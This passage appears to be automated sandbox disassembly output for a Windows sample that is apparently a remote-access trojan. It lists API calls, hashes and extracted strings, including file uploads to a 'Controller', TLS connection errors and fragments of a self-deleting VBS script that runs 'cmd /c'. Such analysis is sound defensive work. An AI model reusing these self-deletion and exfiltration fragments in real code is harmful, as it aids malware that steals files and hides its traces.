                                                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                        • String ID: Close
                                                                                        • API String ID: 1657328048-3535843008
                                                                                        • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                                        • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                                                                        • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                                        • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,00000000,00000000,?,00474EF8,?), ref: 00404E38
                                                                                        • SetEvent.KERNEL32(00000000), ref: 00404E43
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00404E4C
                                                                                        • closesocket.WS2_32(FFFFFFFF), ref: 00404E5A
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404E91
                                                                                        • SetEvent.KERNEL32(00000000), ref: 00404EA2
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404EA9
                                                                                        • SetEvent.KERNEL32(00000000), ref: 00404EBA
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00404EBF
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00404EC4
                                                                                        • SetEvent.KERNEL32(00000000), ref: 00404ED1
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00404ED6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 3658366068-263838557
                                                                                        • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                                                                        • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                                                                        • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                                                                        • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$Info
                                                                                        • String ID:
                                                                                        • API String ID: 2509303402-0
                                                                                        • Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                                                                        • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                                                                        • Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                                                                        • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                                                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                                                                        • __aulldiv.LIBCMT ref: 00408D4D
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                                                        • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                        • API String ID: 3086580692-2582957567
                                                                                        • Opcode ID: 64cefbb928e21c2f7d127ca4721bf1c832eccef9f0ecc8420659d86e10d9b8ce
                                                                                        • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                                                                        • Opcode Fuzzy Hash: 64cefbb928e21c2f7d127ca4721bf1c832eccef9f0ecc8420659d86e10d9b8ce
                                                                                        • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00001388), ref: 0040A740
                                                                                          • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                                                                          • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                                          • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                                          • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                        • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                        • API String ID: 3795512280-1152054767
                                                                                        • Opcode ID: dd9c0471e25d076647664c84ec6971b7212badb5cce70a00efb0c7fa575d8801
                                                                                        • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                                                                        • Opcode Fuzzy Hash: dd9c0471e25d076647664c84ec6971b7212badb5cce70a00efb0c7fa575d8801
                                                                                        • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                        • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                        • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                        • API String ID: 994465650-3229884001
                                                                                        • Opcode ID: 73075052d8b02f035b309482e82d4e6ffd926ef573fac63689623bdc7e9bf8aa
                                                                                        • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                                                                        • Opcode Fuzzy Hash: 73075052d8b02f035b309482e82d4e6ffd926ef573fac63689623bdc7e9bf8aa
                                                                                        • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___free_lconv_mon.LIBCMT ref: 0045130A
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                                                                        • _free.LIBCMT ref: 004512FF
                                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                        • _free.LIBCMT ref: 00451321
                                                                                        • _free.LIBCMT ref: 00451336
                                                                                        • _free.LIBCMT ref: 00451341
                                                                                        • _free.LIBCMT ref: 00451363
                                                                                        • _free.LIBCMT ref: 00451376
                                                                                        • _free.LIBCMT ref: 00451384
                                                                                        • _free.LIBCMT ref: 0045138F
                                                                                        • _free.LIBCMT ref: 004513C7
                                                                                        • _free.LIBCMT ref: 004513CE
                                                                                        • _free.LIBCMT ref: 004513EB
                                                                                        • _free.LIBCMT ref: 00451403
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                        • String ID:
                                                                                        • API String ID: 161543041-0
                                                                                        • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                        • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                                                                        • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                        • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00419FB9
                                                                                        • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                                                                        • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                                                                        • GetLocalTime.KERNEL32(?), ref: 0041A105
                                                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                        • API String ID: 489098229-1431523004
                                                                                        • Opcode ID: 0e7dd5b9c8f3c8bbf87e47502bed00745cf23af802625de92c9b4d39b7d12e2e
                                                                                        • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                                                                        • Opcode Fuzzy Hash: 0e7dd5b9c8f3c8bbf87e47502bed00745cf23af802625de92c9b4d39b7d12e2e
                                                                                        • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                                                                          • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                                                                          • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                                                                          • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                                                        • ExitProcess.KERNEL32 ref: 0040D9C4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                        • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                        • API String ID: 1913171305-3159800282
                                                                                        • Opcode ID: fa01d9a58f05a7cf40da9c9b0b07af66ac6c6027c41b165ee73ccb5acdae289a
                                                                                        • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                                                                        • Opcode Fuzzy Hash: fa01d9a58f05a7cf40da9c9b0b07af66ac6c6027c41b165ee73ccb5acdae289a
                                                                                        • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free
                                                                                        • String ID:
                                                                                        • API String ID: 269201875-0
                                                                                        • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                        • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                                                                        • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                        • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                                                                        • GetLastError.KERNEL32 ref: 00455CEF
                                                                                        • __dosmaperr.LIBCMT ref: 00455CF6
                                                                                        • GetFileType.KERNEL32(00000000), ref: 00455D02
                                                                                        • GetLastError.KERNEL32 ref: 00455D0C
                                                                                        • __dosmaperr.LIBCMT ref: 00455D15
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                                                                        • CloseHandle.KERNEL32(?), ref: 00455E7F
                                                                                        • GetLastError.KERNEL32 ref: 00455EB1
                                                                                        • __dosmaperr.LIBCMT ref: 00455EB8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                        • String ID: H
                                                                                        • API String ID: 4237864984-2852464175
                                                                                        • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                                        • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                                                                        • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                                        • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                                                                        • __alloca_probe_16.LIBCMT ref: 00453EEA
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                                                                        • __alloca_probe_16.LIBCMT ref: 00453F94
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                                                                        • __freea.LIBCMT ref: 00454003
                                                                                        • __freea.LIBCMT ref: 0045400F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                        • String ID: \@E
                                                                                        • API String ID: 201697637-1814623452
                                                                                        • Opcode ID: a13eae8444da2cd2cd5bd958d846eb3c57669df7893581f63a52b2ce53b4c5f1
                                                                                        • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                                                                        • Opcode Fuzzy Hash: a13eae8444da2cd2cd5bd958d846eb3c57669df7893581f63a52b2ce53b4c5f1
                                                                                        • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044AC49 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 216COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                                                                                        • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                                                                                        • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                                                                        • __freea.LIBCMT ref: 0044AE30
                                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                                                                        • __freea.LIBCMT ref: 0044AE39
                                                                                        • __freea.LIBCMT ref: 0044AE5E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                        • String ID: $C$PkGNG
                                                                                        • API String ID: 3864826663-3740547665
                                                                                        • Opcode ID: f1dce60ce4001dd5a90d09b77d0bc29d4a24cdc1178cf7b183dfabd27102bb0f
                                                                                        • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                                                                        • Opcode Fuzzy Hash: f1dce60ce4001dd5a90d09b77d0bc29d4a24cdc1178cf7b183dfabd27102bb0f
                                                                                        • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free
                                                                                        • String ID: \&G$\&G$`&G
                                                                                        • API String ID: 269201875-253610517
                                                                                        • Opcode ID: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                                                                                        • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                                                                        • Opcode Fuzzy Hash: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                                                                                        • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

